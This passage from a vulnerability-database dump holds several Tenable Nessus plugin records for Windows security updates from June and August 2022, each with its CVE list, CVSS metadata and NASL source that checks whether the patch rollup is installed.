21H2 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35797", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016616.NASL", "href": "https://www.tenable.com/plugins/nessus/163951", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163951);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-30197\",\n \"CVE-2022-33670\",\n \"CVE-2022-34301\",\n \"CVE-2022-34302\",\n \"CVE-2022-34303\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34705\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34712\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35757\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n \"CVE-2022-35762\",\n \"CVE-2022-35763\",\n \"CVE-2022-35764\",\n \"CVE-2022-35765\",\n \"CVE-2022-35766\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35792\",\n \"CVE-2022-35793\",\n \"CVE-2022-35794\",\n \"CVE-2022-35795\",\n \"CVE-2022-35797\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016616\");\n script_xref(name:\"MSFT\", value:\"MS22-5016616\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016616: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016616. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016616\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016616\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016616\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016616'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvar os_name = get_kb_item(\"SMB/ProductName\");\n\nif ( ( (\"enterprise\" >< tolower(os_name) || \"education\" >< tolower(os_name))\n &&\n smb_check_rollup(os:'10',\n os_build:19042,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016616]) \n )\n ||\n smb_check_rollup(os:'10',\n os_build:19043,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016616])\n || \n smb_check_rollup(os:'10',\n os_build:19044,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016616])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:27:16", "description": "The remote Windows host is missing security update 5016627. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016627: Windows Server 2022 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-34715", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016627.NASL", "href": "https://www.tenable.com/plugins/nessus/163953", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163953);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30194\",\n \"CVE-2022-30197\",\n \"CVE-2022-33670\",\n \"CVE-2022-34301\",\n \"CVE-2022-34302\",\n \"CVE-2022-34303\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34705\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34712\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-34715\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35757\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n \"CVE-2022-35762\",\n \"CVE-2022-35763\",\n \"CVE-2022-35764\",\n \"CVE-2022-35765\",\n \"CVE-2022-35766\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35792\",\n \"CVE-2022-35793\",\n \"CVE-2022-35794\",\n \"CVE-2022-35795\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016627\");\n script_xref(name:\"MSFT\", value:\"MS22-5016627\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016627: Windows Server 2022 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016627. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016627\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016627\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016627\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-34715\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016627'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:20348,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016627])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-16T17:49:08", "description": "The remote Windows host is missing security update 5014710. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\n - Kerberos AppContainer Security Feature Bypass Vulnerability (CVE-2022-30164)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014710: Windows 10 LTS 1507 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014710.NASL", "href": "https://www.tenable.com/plugins/nessus/162206", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162206);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014710\");\n script_xref(name:\"MSFT\", value:\"MS22-5014710\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014710: Windows 10 LTS 1507 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014710. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\n - Kerberos AppContainer Security Feature Bypass Vulnerability (CVE-2022-30164)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014710\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014710\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30161\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014710'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014710])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-16T17:48:16", "description": "The remote Windows host is missing security update 5014678. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014678: Windows Server 2022 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30132", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014678.NASL", "href": "https://www.tenable.com/plugins/nessus/162205", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162205);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-30132\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014678\");\n script_xref(name:\"MSKB\", value:\"5014677\");\n script_xref(name:\"MSFT\", value:\"MS22-5014678\");\n script_xref(name:\"MSFT\", value:\"MS22-5014677\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014678: Windows Server 2022 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014678. It is, therefore, affected by 